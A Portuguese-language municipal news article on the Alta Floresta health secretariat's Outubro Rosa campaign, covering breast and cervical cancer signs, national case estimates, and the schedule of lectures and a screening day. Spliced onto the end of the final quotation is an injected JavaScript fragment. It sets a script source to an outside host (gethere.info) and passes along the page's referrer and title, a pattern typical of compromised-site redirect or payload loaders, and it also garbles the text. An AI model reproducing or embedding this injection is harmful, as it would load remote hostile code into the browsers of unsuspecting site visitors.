Capa / Em Destaque / Secretaria de Saúde desenvolve atividades de conscientização e prevenção do câncer

Secretaria de Saúde desenvolve atividades de conscientização e prevenção do câncer

outubro-rosa-editado-617x460Dionéia Martins

O mês de outubro é conhecido como Outubro Rosa, porque é um mês destinado especialmente aos cuidados da mulher. Ações desenvolvidas ao longo do mês pela Secretaria Municipal de Saúde visa conscientizar e intensificar os exames preventivos de câncer de mama e do colo do útero.

Durante os 31 dias dedicados a essa ações, todas as Unidades Básicas de Saúde (UBS) de Alta Floresta, estão intensificando os exames preventivos para a mulher, e mostrando os avanços já conquistados e também os desafios para vencer o câncer que atinge um grande número de brasileiras por ano.

O Instituto Nacional de Câncer (INCA) estima 57 mil casos novos de câncer de mama em 2016. O SUS garante a oferta gratuita de exame de mamografia para as mulheres brasileiras em todas as faixas etárias, desde que exista recomendação médica.

A ideia é informar e conscientizar sobre a doença e proporcionar maior acesso aos serviços de diagnóstico e de tratamento para a redução da mortalidade. A campanha tem como um dos objetivos enfatizar a importância de a mulher ficar atenta a alterações suspeitas nas mamas. Os principais sinais e sintomas do câncer de mama são: caroço (nódulo) fixo, endurecido e, geralmente, indolor; pele da mama avermelhada, retraída ou parecida com casca de laranja; alterações no bico do peito (mamilo); pequenos nódulos na região embaixo dos braços (axilas) ou no pescoço ou saída espontânea de líquido dos mamilos.

O Inca também estima mais de 16 mil novos casos de câncer de colo de útero este ano, um risco estimado de 15,85 casos a cada 100 mil mulheres. É a terceira localização primária de incidência e de mortalidade por câncer em mulheres no país, excluído pele não melanoma.

É uma doença de desenvolvimento lento, que pode cursar sem sintomas em fase inicial e evoluir para quadros de sangramento vaginal intermitente ou após a relação sexual, secreção vaginal anormal e dor abdominal associada com queixas urinárias ou intestinais nos casos mais avançados.

PrintDIA D

A campanha Outubro Rosa será lançada oficialmente no dia 21 de outubro juntamente com o Novembro Azul dedicado aos cuidados do homem. “Esse ano a gente vai fazer a abertura com palestras educativas, sobre as prevenções do câncer de mama e do colo de útero, e de próstata já aproveitando o Novembro Azul que vem logo em seguida”, disse a gerente da Atenção Básica, Ligia Piton.

A abertura da campanha acontecerá na sexta-feira, 21, às 13:30 horas no auditório do Museu de História Natural de Alta Floresta. “Vai está realizando as palestras o Dr. Charles, Dra. Barbara, Dra. Sandra, a gente vai ter também o Núcleo de Apoio a Saúde da Famílias (NASF), também participando e inovando nas ações”, afirmou Piton.

A abertura terá a participação dos profissionais de saúde, dos agentes de saúde. “São os agentes de saúde que levam as informações das unidades de saúde pras casa dos moradores. Queremos convidar toda a população para participar dessas palestras, pra ter maior conhecimento sobre essa parte de prevenção”, convidou.

No sábado dia 22, será o dia D da campanha, todas as Unidades Básicas de Saúde estarão abertas realizando os exames preventivos nas mulheres. “É um dia especifico só de coleta de preventivo, orientação de auto exame das mamas, com solicitação de mamografia e também em algumas unidades vai ter atendimento odontológico, tudo voltado pra saúde da mulher”, afirmou a Gerente.

A programação das UBS com os horários de atendimentos serão antecipadamente divulgados nas unidades e nos meios de comunicação para que todas as mulheres que ainda não realizaram os exames possam aproveitar a data. “As mulheres que estão como seu preventivo atrasado vão poder participar no sábado que tem uma flexibilidade melhor, pra deixar em dia tanto o seu auto exame da mama, como a coleta do preventivo”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top